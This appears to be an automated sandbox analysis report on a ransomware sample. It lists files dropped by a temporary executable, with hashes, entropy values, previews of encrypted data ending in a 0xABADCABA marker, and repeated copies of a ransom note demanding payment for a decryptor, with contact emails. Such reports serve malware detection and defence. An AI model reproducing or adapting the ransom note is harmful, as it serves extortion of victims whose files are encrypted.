                                                                                                                                            SHA-512:A079899FCA7DB06DCFC975A100538595C31271933B14CBA9B4FDF862A1FACDAF57C294415E8F8B05708956091921DC5C32A28226E0FBFA51D2DC38DD7B4F6FF0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:9.i..N..2....`.......5p...g{...aI5...........4p...aQ..=..|3Z..&...r... '*Me;....!&.<}../..{.. ;......^K<&..l{3.h...r..0.J.8>/5`CVy%......W@.....l.;..z....2......0..1.@W&......0G.>E......L..$+U.O. _.......M..9$5.Z>\..;.k..G.r.{.<H...!.U....h...j.........)C......MD.[...kY`V,..mK.O...y..>)1..:^.B..R..%5.v.~.....U.qP..(.0.DB.a.e.. ..G.....H{fI.........~gP.....P.f.r\..7D+..*.D..j.V`s..k."....n....V{...5V....^. ...&...$q.....#kQ..].l.U.#....!.2%y.......<.'....kz...E...q:.l....3.3.....Q........U.['U.o%.&.].]-.....[3....P...0..j.TF....bI7...m...A.....m.]BP..t/v.<.-...x....$...._y.<..|.>?^..)kH?qW..c.G..JU(.....n....K...I......q..x^fR...."..l.'j.cd... ...9.Du."..*...}..V.J5.._#.......<....Z.#..%&...QN.O.,s3...8.q.....on...:.."r._.'K.e....pi...3.N..g..t....l/Z...rN:...C..%.`=V....u..n.^g......E[:1'@Q...]...:%..z.`.[In..2.P..o9Eo.P..8.....w\d......`....cp./..%.....#.H\..g7...C.....X...?;...R"..y..!.......?..2.hej.|.k..-.".i.g......%....k4w..k
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24418
                                                                                                                                            Entropy (8bit):2.365300886043448
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:XonoCgttz22x59Il50zoaFcYDRv6+onTbS:0uh22x59IHpaqkvWnHS
                                                                                                                                            MD5:A1F2177388DD2811AA5F2237895D90C8
                                                                                                                                            SHA1:1416935050D94141F5B6E5334D1B3A4AEF14880C
                                                                                                                                            SHA-256:FCF23F89505D9CDF1D752C74662CFA3806EC8B705BE47EC03143245C0F793B22
                                                                                                                                            SHA-512:A079899FCA7DB06DCFC975A100538595C31271933B14CBA9B4FDF862A1FACDAF57C294415E8F8B05708956091921DC5C32A28226E0FBFA51D2DC38DD7B4F6FF0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:9.i..N..2....`.......5p...g{...aI5...........4p...aQ..=..|3Z..&...r... '*Me;....!&.<}../..{.. ;......^K<&..l{3.h...r..0.J.8>/5`CVy%......W@.....l.;..z....2......0..1.@W&......0G.>E......L..$+U.O. _.......M..9$5.Z>\..;.k..G.r.{.<H...!.U....h...j.........)C......MD.[...kY`V,..mK.O...y..>)1..:^.B..R..%5.v.~.....U.qP..(.0.DB.a.e.. ..G.....H{fI.........~gP.....P.f.r\..7D+..*.D..j.V`s..k."....n....V{...5V....^. ...&...$q.....#kQ..].l.U.#....!.2%y.......<.'....kz...E...q:.l....3.3.....Q........U.['U.o%.&.].]-.....[3....P...0..j.TF....bI7...m...A.....m.]BP..t/v.<.-...x....$...._y.<..|.>?^..)kH?qW..c.G..JU(.....n....K...I......q..x^fR...."..l.'j.cd... ...9.Du."..*...}..V.J5.._#.......<....Z.#..%&...QN.O.,s3...8.q.....on...:.."r._.'K.e....pi...3.N..g..t....l/Z...rN:...C..%.`=V....u..n.^g......E[:1'@Q...]...:%..z.`.[In..2.P..o9Eo.P..8.....w\d......`....cp./..%.....#.H\..g7...C.....X...?;...R"..y..!.......?..2.hej.|.k..-.".i.g......%....k4w..k
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):530
                                                                                                                                            Entropy (8bit):7.549513906331041
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:I6lw0WqQVr7broE44cFOO3PV/h7oS/wNXTj6sn:m0WfVr7HosuOOfV/h10T9
                                                                                                                                            MD5:F04A743D205B949FFFE23F627419EC55
                                                                                                                                            SHA1:A5C7A82B45AB2D5169FCEAC2ADE74880CF7A3172
                                                                                                                                            SHA-256:0EC8EC8102F5678845FDAF9EC65E18AA123E30C32F30BBBB0303A9333F0C08FE
                                                                                                                                            SHA-512:9153A945C19B5CAE3BC06EEEA9CFC6FB79685383122759052EA6A4BEA7528117188AD7AC353B71F770DCDAA3C4F9099BA226482903A343633460094F1D748C40
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....{..7.?..a.U.....!..~....6q(b....I..8.$.a.(s......s..J.:.8......OQV=.|^..._.f....?..5).k..ztZ.s$..3,......]E...X...yR.UZ..........H..=..JZnX..8......b ..G..k.C..,%W}W~...ke.d^.-'D.-E......E.....B.I#'.....+...1+.=.....g..(.._.'...1..({......W.=.).>1.!=.`.......S.xI3.....84`..'...o%.w...=.A.....kD.h.g.-..3Z...b........z.}.......F..e......."..<.Zg.Y.......o.1@.D.7..k,:D...O.'.k{.DIC..\...?.}.e....*.Q.s....O..n5@h...g.m.-..U`..1`i..X.r.z+.?.o......."J^g.K.......%Z.E....;`.............0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):530
                                                                                                                                            Entropy (8bit):7.549513906331041
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:I6lw0WqQVr7broE44cFOO3PV/h7oS/wNXTj6sn:m0WfVr7HosuOOfV/h10T9
                                                                                                                                            MD5:F04A743D205B949FFFE23F627419EC55
                                                                                                                                            SHA1:A5C7A82B45AB2D5169FCEAC2ADE74880CF7A3172
                                                                                                                                            SHA-256:0EC8EC8102F5678845FDAF9EC65E18AA123E30C32F30BBBB0303A9333F0C08FE
                                                                                                                                            SHA-512:9153A945C19B5CAE3BC06EEEA9CFC6FB79685383122759052EA6A4BEA7528117188AD7AC353B71F770DCDAA3C4F9099BA226482903A343633460094F1D748C40
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....{..7.?..a.U.....!..~....6q(b....I..8.$.a.(s......s..J.:.8......OQV=.|^..._.f....?..5).k..ztZ.s$..3,......]E...X...yR.UZ..........H..=..JZnX..8......b ..G..k.C..,%W}W~...ke.d^.-'D.-E......E.....B.I#'.....+...1+.=.....g..(.._.'...1..({......W.=.).>1.!=.`.......S.xI3.....84`..'...o%.w...=.A.....kD.h.g.-..3Z...b........z.}.......F..e......."..<.Zg.Y.......o.1@.D.7..k,:D...O.'.k{.DIC..\...?.}.e....*.Q.s....O..n5@h...g.m.-..U`..1`i..X.r.z+.?.o......."J^g.K.......%Z.E....;`.............0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14722
                                                                                                                                            Entropy (8bit):5.994744975266635
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:788sFy8r1xZVfe8gAtqe8TlZMX1sgUVa3ddMVsuNeMcGdSD9obOUAVlcMudM/Y1W:3eRVbb0lZ6mgtdHOelGdWaolvsTyHr
                                                                                                                                            MD5:42A0ABE6A773C63CA38204BE71E69ED0
                                                                                                                                            SHA1:5EBD7BE964CE8102118DB64776C6E4E6B2571E7D
                                                                                                                                            SHA-256:6B1E72F08DB2FC9A16A55DEA46C8B445B143E407D56B6E9CD84B8D8E57B0918A
                                                                                                                                            SHA-512:CBA4B33BB7260075559468033AA2BC4CE5A7A9ECBA79C70FAC299B01158A94181EAF0818E634353A6C134EC5788767F33CDCEB666F7EF6DC9C1C603D28BD9B55
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..\..Q......<..A......1%5|;..e..%%L..K.*..o....t.Ey...$9. ...^.........>@..<..l...^.Ot.....'.....3..:3..P.....g.+.aQ)..yz...2.....H.OI..o.U&EH.%UQb@7J..g...`HO....k...A...D....8bnm.V...83..5...={....8...V.b..q.....i.j8?.?J...V........w.Z9...t5....,a.Jk.....[.>...G~..`[5../{...s...{.....{E..[.}......06{.....E, .....r6..mQ.OH.?..W=.5.2C.97....:..G..8;...[.g..S..'T.'<.lZ...8..(..DY..f.}...!j...5t..........T...,..:...+...M7K.r...|.;m.c.r.$.[J.>vz.....o.d..."...%/....._.B)...+@C.!..d=..P.3W.}......Ea.....6..a.&a. g.O...2.J./..,i%>..)......aX*./}..{\...`.... ...[^c.....n..Xm.G.O....9..(.....A..H4.`N.b.|.].``{n.h......#.a.o].&.g......2.$......n.....R...'5.3t..DM>./..E....../0h.@....3.3..65V...&S.y\..../..H..,....^,....{.>..5..GP.z...nK7.FB.?.........M..Z.c..5.8Tk.y&.....up.X....D.6...'NPu.....g...)wV....41......i(w...p.Hlt..y#..k.U...GoJ.;]..o.P...e......L~W..r?nPV.../]..;...K.._e..FK.O..IQ.b.p....Q....W.#C...v....D...~...6..7.....Xh..,\.~....F.Yb..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14722
                                                                                                                                            Entropy (8bit):5.994744975266635
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:788sFy8r1xZVfe8gAtqe8TlZMX1sgUVa3ddMVsuNeMcGdSD9obOUAVlcMudM/Y1W:3eRVbb0lZ6mgtdHOelGdWaolvsTyHr
                                                                                                                                            MD5:42A0ABE6A773C63CA38204BE71E69ED0
                                                                                                                                            SHA1:5EBD7BE964CE8102118DB64776C6E4E6B2571E7D
                                                                                                                                            SHA-256:6B1E72F08DB2FC9A16A55DEA46C8B445B143E407D56B6E9CD84B8D8E57B0918A
                                                                                                                                            SHA-512:CBA4B33BB7260075559468033AA2BC4CE5A7A9ECBA79C70FAC299B01158A94181EAF0818E634353A6C134EC5788767F33CDCEB666F7EF6DC9C1C603D28BD9B55
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..\..Q......<..A......1%5|;..e..%%L..K.*..o....t.Ey...$9. ...^.........>@..<..l...^.Ot.....'.....3..:3..P.....g.+.aQ)..yz...2.....H.OI..o.U&EH.%UQb@7J..g...`HO....k...A...D....8bnm.V...83..5...={....8...V.b..q.....i.j8?.?J...V........w.Z9...t5....,a.Jk.....[.>...G~..`[5../{...s...{.....{E..[.}......06{.....E, .....r6..mQ.OH.?..W=.5.2C.97....:..G..8;...[.g..S..'T.'<.lZ...8..(..DY..f.}...!j...5t..........T...,..:...+...M7K.r...|.;m.c.r.$.[J.>vz.....o.d..."...%/....._.B)...+@C.!..d=..P.3W.}......Ea.....6..a.&a. g.O...2.J./..,i%>..)......aX*./}..{\...`.... ...[^c.....n..Xm.G.O....9..(.....A..H4.`N.b.|.].``{n.h......#.a.o].&.g......2.$......n.....R...'5.3t..DM>./..E....../0h.@....3.3..65V...&S.y\..../..H..,....^,....{.>..5..GP.z...nK7.FB.?.........M..Z.c..5.8Tk.y&.....up.X....D.6...'NPu.....g...)wV....41......i(w...p.Hlt..y#..k.U...GoJ.;]..o.P...e......L~W..r?nPV.../]..;...K.._e..FK.O..IQ.b.p....Q....W.#C...v....D...~...6..7.....Xh..,\.~....F.Yb..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):302
                                                                                                                                            Entropy (8bit):7.212157482813233
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:8s8RMbdDJP9J+RgC5Aj4dBceEUZFbiXwxosDaSgB409n:8FRMZR+RgC5gHe9ZFb0IxGSPEn
                                                                                                                                            MD5:204134F95C3FAE0B2FDC0BE37B9E9FD8
                                                                                                                                            SHA1:B9D58A95334E514FA0CBA492453F9E56619C4791
                                                                                                                                            SHA-256:7346857CBE70C1BC9FF1C323A0A6AD019584C948B8337F1A3E5D3313B9962708
                                                                                                                                            SHA-512:44A3C88FEB1F8237496E672D1716F0A5DE7B82E02632D5E80EEBE41B18F47B749D3DC33B66536D7562050472827AA10C00A06908F134E1D0021DC6D446B58BAA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:!.Xv7..wK..8...'..+].... .;r........t..o.4...#.k.3eN.._.....#./^.Qi$..;..p..n.&....O..! ....4.~..Fq...8.}.r..#`.`.....7..../.*.s...&......<I.N%c.$.O.S....0_.,o....j.._B..T.@.M.S.N.hq..rq.. ..H.k@.D;L....v.....7...m;.....^.........^lG.D..4.#<.B.I.y..l...+....Y......y.Qp.....rHU0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):302
                                                                                                                                            Entropy (8bit):7.212157482813233
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:8s8RMbdDJP9J+RgC5Aj4dBceEUZFbiXwxosDaSgB409n:8FRMZR+RgC5gHe9ZFb0IxGSPEn
                                                                                                                                            MD5:204134F95C3FAE0B2FDC0BE37B9E9FD8
                                                                                                                                            SHA1:B9D58A95334E514FA0CBA492453F9E56619C4791
                                                                                                                                            SHA-256:7346857CBE70C1BC9FF1C323A0A6AD019584C948B8337F1A3E5D3313B9962708
                                                                                                                                            SHA-512:44A3C88FEB1F8237496E672D1716F0A5DE7B82E02632D5E80EEBE41B18F47B749D3DC33B66536D7562050472827AA10C00A06908F134E1D0021DC6D446B58BAA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:!.Xv7..wK..8...'..+].... .;r........t..o.4...#.k.3eN.._.....#./^.Qi$..;..p..n.&....O..! ....4.~..Fq...8.}.r..#`.`.....7..../.*.s...&......<I.N%c.$.O.S....0_.,o....j.._B..T.@.M.S.N.hq..rq.. ..H.k@.D;L....v.....7...m;.....^.........^lG.D..4.#<.B.I.y..l...+....Y......y.Qp.....rHU0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):320
                                                                                                                                            Entropy (8bit):7.20666104481726
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:EnSU84IcXgaMGaP3o/sIoO/9V+KuSo9O8tA9saxBfkjC8pcYQx+belOon:En2cwai3Ssg/9BuSo9hA9DfkBQ4+Oon
                                                                                                                                            MD5:DDE1D4E8DD1DF088E8FC174BE6551F71
                                                                                                                                            SHA1:28D7F9FE4E57744D31921D519498FF0048D68C21
                                                                                                                                            SHA-256:1CBAF2D062BE91A46672AFDBE2E0C9B516B50AD5F7D29D4B5DCE37BF7E8BA62E
                                                                                                                                            SHA-512:E3218D5F50DB5A3CD0EAEFC759B09F9F78AC8EC52029016D401D06ED4864B91C23B6D875C18D69C6535106A2FD3807BE6BF32092438E4057FBDA2BA52FABD64B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:Y.=*..z..j..p.X;..E4,..q.}.0.....!)-..~saEwp........t.!..|."..F_.xk.1.#4..GB...b.h.%c-..d..Q.........[e.*.x.d..F.h.q.I...? .....z8.q.yv.x...x.m$.Y..k.H%..;.%.$..Bi..a....)...J.<.+I%.W{.....dA..._)@.7.7e...J@#x........#.....a..M...J.0.\..G@:.b....k....}..m.?..W.m...;.~.W0...z....T.&.e..%...A.#.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):320
                                                                                                                                            Entropy (8bit):7.20666104481726
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:EnSU84IcXgaMGaP3o/sIoO/9V+KuSo9O8tA9saxBfkjC8pcYQx+belOon:En2cwai3Ssg/9BuSo9hA9DfkBQ4+Oon
                                                                                                                                            MD5:DDE1D4E8DD1DF088E8FC174BE6551F71
                                                                                                                                            SHA1:28D7F9FE4E57744D31921D519498FF0048D68C21
                                                                                                                                            SHA-256:1CBAF2D062BE91A46672AFDBE2E0C9B516B50AD5F7D29D4B5DCE37BF7E8BA62E
                                                                                                                                            SHA-512:E3218D5F50DB5A3CD0EAEFC759B09F9F78AC8EC52029016D401D06ED4864B91C23B6D875C18D69C6535106A2FD3807BE6BF32092438E4057FBDA2BA52FABD64B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:Y.=*..z..j..p.X;..E4,..q.}.0.....!)-..~saEwp........t.!..|."..F_.xk.1.#4..GB...b.h.%c-..d..Q.........[e.*.x.d..F.h.q.I...? .....z8.q.yv.x...x.m$.Y..k.H%..;.%.$..Bi..a....)...J.<.+I%.W{.....dA..._)@.7.7e...J@#x........#.....a..M...J.0.\..G@:.b....k....}..m.?..W.m...;.~.W0...z....T.&.e..%...A.#.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
